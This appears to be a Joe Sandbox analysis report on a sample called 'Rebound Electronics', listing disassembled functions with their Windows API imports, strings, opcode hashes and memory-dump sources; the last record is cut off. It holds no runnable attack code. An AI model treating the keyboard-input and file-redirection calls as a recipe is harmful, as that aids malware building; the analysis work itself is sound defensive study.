Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: fbacb80a5d21d814e6918b7a226388955ca7c9e3ed8c29357b43a4f33874f0b7
Instruction ID: b3706546bef1750f399726a51f8dcfeafc9fa8daafd0a7ccf622ac47ab35dfb4
Opcode Fuzzy Hash: fbacb80a5d21d814e6918b7a226388955ca7c9e3ed8c29357b43a4f33874f0b7
Instruction Fuzzy Hash: 68E01A70690342ABDB205F71EC8AB1D3A64B70171AF604028F103DE0A0DBF85880DF58

Function 00C4235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C42276), ref: 00C42376
GetProcAddress.KERNEL32(00000000), ref: 00C4237D

Strings

RoUninitialize, xrefs: 00C42365
combase.dll, xrefs: 00C42371

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: f9b22ceceb0d3ba1456b46093fcf273e30ce716c27963ca42a3267ed0cb6e31b
Instruction ID: 3512a06f539513d1f9af6ff1ddd332b5c838684051341ecfd1db22ade405b5ab
Opcode Fuzzy Hash: f9b22ceceb0d3ba1456b46093fcf273e30ce716c27963ca42a3267ed0cb6e31b
Instruction Fuzzy Hash: 2FE0B670645381ABDB205FA1ED4EB0C3A69B705706F200424F10BDA4B0CBF86980DA59

Function 00C9AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C9AC60
__swprintf.LIBCMT ref: 00C9AC94

Strings

%.3d, xrefs: 00C9AC6E
WIN_XPe, xrefs: 00C9ACD3

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 28d8e7b91fb7d8e7a5660821ce39fc13394950c1e67c0597beedb1d47d02c160
Instruction ID: 32d7a6af267617d9ca5f2020b80dc69ec8390d1c3be4729e45698e915e52e82c
Opcode Fuzzy Hash: 28d8e7b91fb7d8e7a5660821ce39fc13394950c1e67c0597beedb1d47d02c160
Instruction Fuzzy Hash: 13E012B1804618EBCF149751DD0DEF9737CA704741F1404D2F947A6100D6369B84EA52

Function 00C242F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C242EC,?,00C242AA,?), ref: 00C24304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C24316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00C24310
kernel32.dll, xrefs: 00C242FF

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 8ebd0db23620be98f6b086eaad3693262972fafa9228305c1aedb235a261b918
Instruction ID: 06f9b02e24bfd4db16f61c8a4245db34f7345394acfbad742c4ddc7232320a3e
Opcode Fuzzy Hash: 8ebd0db23620be98f6b086eaad3693262972fafa9228305c1aedb235a261b918
Instruction Fuzzy Hash: 58D0A770400722DFC7248F64F80C74E77D4AF15325B00442AE657D3A70D7B0C8808610

Function 00C82205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C821FB,?,00C823EF), ref: 00C82213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00C82225

Strings

kernel32.dll, xrefs: 00C8220E
GetProcessId, xrefs: 00C8221F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 53b954e31d33b9758c3fd0e69404cbe62748b7e9b79e5b91774d10415d9f81e0
Instruction ID: 294c23866dd54c40b6906e3680d3c911bc0081b9edabac494f0c38675ee928f3
Opcode Fuzzy Hash: 53b954e31d33b9758c3fd0e69404cbe62748b7e9b79e5b91774d10415d9f81e0
Instruction Fuzzy Hash: BFD0A7344007129FC7215F70F80C74AB7D4EF06329B00442FEA57E3650E770D8808750

Function 00C2434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00C241BB,00C24341,?,00C2422F,?,00C241BB,?,?,?,?,00C239FE,?,00000001), ref: 00C24359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C2436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00C24365
kernel32.dll, xrefs: 00C24354

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 2cb7f22366c87d503dbf9ce970058bcfb817702f4ca3606af30676a8cf0612fb
Instruction ID: d516da24b26734c6e5f7602267f011cebe64c7652515f668f62b1eb3ede9e486
Opcode Fuzzy Hash: 2cb7f22366c87d503dbf9ce970058bcfb817702f4ca3606af30676a8cf0612fb
Instruction Fuzzy Hash: 1DD0A7308007229FC7248F70F80874A77D4AF21739B00452EE593D3A60D7B0D8808610

Function 00C60564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00C6052F,?,00C606D7), ref: 00C60572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00C60584

Strings

UnRegisterTypeLibForUser, xrefs: 00C6057E
oleaut32.dll, xrefs: 00C6056D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 225fbd003d265b4cf68b722dc617b0204d497bc0d5673ad67c693f62c376ce73
Instruction ID: 96f2b96af7f6064aa6e92190224796b3f5e8ac07ce2c7b235f8cd32da549f47d
Opcode Fuzzy Hash: 225fbd003d265b4cf68b722dc617b0204d497bc0d5673ad67c693f62c376ce73
Instruction Fuzzy Hash: C7D05E304003329AC7205FA0A848B4A77E4AB15314B20882BEA93A3650D670C5C08A20

Function 00C60539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00C6051D,?,00C605FE), ref: 00C60547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00C60559

Strings

RegisterTypeLibForUser, xrefs: 00C60553
oleaut32.dll, xrefs: 00C60542

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 1a269a8ece4e475d6942800d613909335bcef9c83e23c9ebd694de61c5cbedcf
Instruction ID: 28a307800e1edb5f1df5b23443f4eb8aa45644d1fa90a846c5486d2a8d537a46
Opcode Fuzzy Hash: 1a269a8ece4e475d6942800d613909335bcef9c83e23c9ebd694de61c5cbedcf
Instruction Fuzzy Hash: 54D0A7304107229FC7308FA0E84874E76E4AB11315B20C82EE557E3660D770CD808A10

Function 00C7ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C7ECBE,?,00C7EBBB), ref: 00C7ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C7ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 00C7ECE2
kernel32.dll, xrefs: 00C7ECD1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: f22d12d281123079afadcdc05f0305caa2e2b6ccdc03e3e197f4df9aaaccaa90
Instruction ID: 755ee7facb452facea3b11d85a34ae75681d2be760aa75f62a3791088a970b4f
Opcode Fuzzy Hash: f22d12d281123079afadcdc05f0305caa2e2b6ccdc03e3e197f4df9aaaccaa90
Instruction Fuzzy Hash: A3D0A7364007239FCB215FA0E84874A77E4AF05315B00C46EFA5BD3650DB70C8C08A10

Function 00C7BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C7BAD3,00000001,00C7B6EE,?,00CBDC00), ref: 00C7BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C7BAFD

Strings

kernel32.dll, xrefs: 00C7BAE6
GetModuleHandleExW, xrefs: 00C7BAF7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 81b9032b9381d459505977a8a05ab0d96f2ff64c1af7c61d2a5804cb2d1b08b4
Instruction ID: da3b37dda2309ccb95783cada2875148f5d6dab2bb01e1d70b588fd0cdc4636c
Opcode Fuzzy Hash: 81b9032b9381d459505977a8a05ab0d96f2ff64c1af7c61d2a5804cb2d1b08b4
Instruction Fuzzy Hash: DFD0A7309007129FC7305F60E848B5A77D4AF05315B00C42AEE57D3650D770DC80C614

Function 00C83BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C83BD1,?,00C83E06), ref: 00C83BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C83BFB

Strings

RegDeleteKeyExW, xrefs: 00C83BF5
advapi32.dll, xrefs: 00C83BE4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 8c782de81f5818361ec3ef04f7128afc4ba36b8812b5a7270c12969fd06e02f9
Instruction ID: 891a75d75ec5dcb97e0a5ab0d35e391dd66399f734445cc79ff6c75d0a155416
Opcode Fuzzy Hash: 8c782de81f5818361ec3ef04f7128afc4ba36b8812b5a7270c12969fd06e02f9
Instruction Fuzzy Hash: DBD0A7704007529FC7206FA0E80874BBAF4AB0272CB10442AF657E3650D7B4C5818F10

Function 00C59B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832e470c2677db1206617d81db853b25393ed5532899ea41868feecbb9310d7d
Instruction ID: 5feca96bf34b1dc1679c2cb6f116549918239c9cb70b300bcb8db45b3bf94d10
Opcode Fuzzy Hash: 832e470c2677db1206617d81db853b25393ed5532899ea41868feecbb9310d7d
Instruction Fuzzy Hash: 2FC15B79A0021AEFCB14CF94C884AAEB7B5FF48701F1045D8ED16AB251D770EE85DB94

Function 00C7AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C7AAB4
CoUninitialize.OLE32 ref: 00C7AABF

Part of subcall function 00C60213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6027B

VariantInit.OLEAUT32(?), ref: 00C7AACA
VariantClear.OLEAUT32(?), ref: 00C7AD9D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: ead1a327c452481708feb42e2eab4375281d874ddecb7ed60c7342edb042600a
Instruction ID: 22a1965c50278f360be28b22d72a9c0c42c0724076f20b1492560d8f8bd78e89
Opcode Fuzzy Hash: ead1a327c452481708feb42e2eab4375281d874ddecb7ed60c7342edb042600a
Instruction Fuzzy Hash: 1AA12475204711AFCB11EF24C491B1EB7E4BF98720F148449FA9A9B7A2CB30ED44DB86

Function 00C591CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C591DD
SysAllocString.OLEAUT32(?), ref: 00C59286
VariantCopy.OLEAUT32 ref: 00C592B5
VariantClear.OLEAUT32(?), ref: 00C592DC

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 79a986d50ced25b1acb1a6881210f2c13ba4b58c86396380762054235c071b8c
Instruction ID: cea16f40df0ed257f78c406833a6836f9c2438db17b785ea93cad6f8f3506053
Opcode Fuzzy Hash: 79a986d50ced25b1acb1a6881210f2c13ba4b58c86396380762054235c071b8c
Instruction Fuzzy Hash: A251B438600306DBDB209F66D49172EB3E5EF55311F20886FE957CB2E1DB3498C89709

Function 00C8C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(018A9960,?), ref: 00C8C544
ScreenToClient.USER32(?,00000002), ref: 00C8C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00C8C5DA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: aabc6391fc7867d6320de0c2dd05afc216b9539e5a0c0d8ab4265dfee6cecb6c
Instruction ID: 5c406f7048b8daaa3714ab3c40c432afc8192781d8d2c25fd084e4ae801451cd
Opcode Fuzzy Hash: aabc6391fc7867d6320de0c2dd05afc216b9539e5a0c0d8ab4265dfee6cecb6c
Instruction Fuzzy Hash: 11514F75900205EFCF10EF68C8C0AAE7BB5EF55328F148669F9659B290D730EE41DBA4

Function 00C5C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C5C462
__itow.LIBCMT ref: 00C5C49C

Part of subcall function 00C5C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C5C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C5C505
__itow.LIBCMT ref: 00C5C55A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 2174e3aef559340023029babf17e4f79b231d942cd83783b384ab10bd8094c9c
Instruction ID: 2d687a7f5e831b88edb247bc239d34eebf5a5f15df7026fd62ee2abc906b3847
Opcode Fuzzy Hash: 2174e3aef559340023029babf17e4f79b231d942cd83783b384ab10bd8094c9c
Instruction Fuzzy Hash: CD41C575600318AFDF11DF54D895FEE7BB5AF49701F000019FE05A7281DB709A89DBA5

Function 00C6390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C63966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C63982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00C639EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00C63A4D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7dbb44f926c4ddcd5dd09bc5247ec2452d7b9632778b5d41c73dc3875a98e029
Instruction ID: a2c8d1343cd1fe35d89f2c4664241e3e180e5c46aa0d0a259366b1f7a99d0cf6
Opcode Fuzzy Hash: 7dbb44f926c4ddcd5dd09bc5247ec2452d7b9632778b5d41c73dc3875a98e029
Instruction Fuzzy Hash: EE410770E04688AAEF318BA58C85BFDBBB59F55311F04015AF4D2932C1C7B48F85EB65

Function 00C6E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C6E742
GetLastError.KERNEL32(?,00000000), ref: 00C6E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C6E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C6E7B9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b7adb8be25d4f6fdfc8f2b3a10c6fe963af7de8f784162ff6c5e4ac70ed256da
Instruction ID: fe1ae0c9f52930d996f0dffbac6a51cdfdc5b15ba8684199e1150904ea0c3458
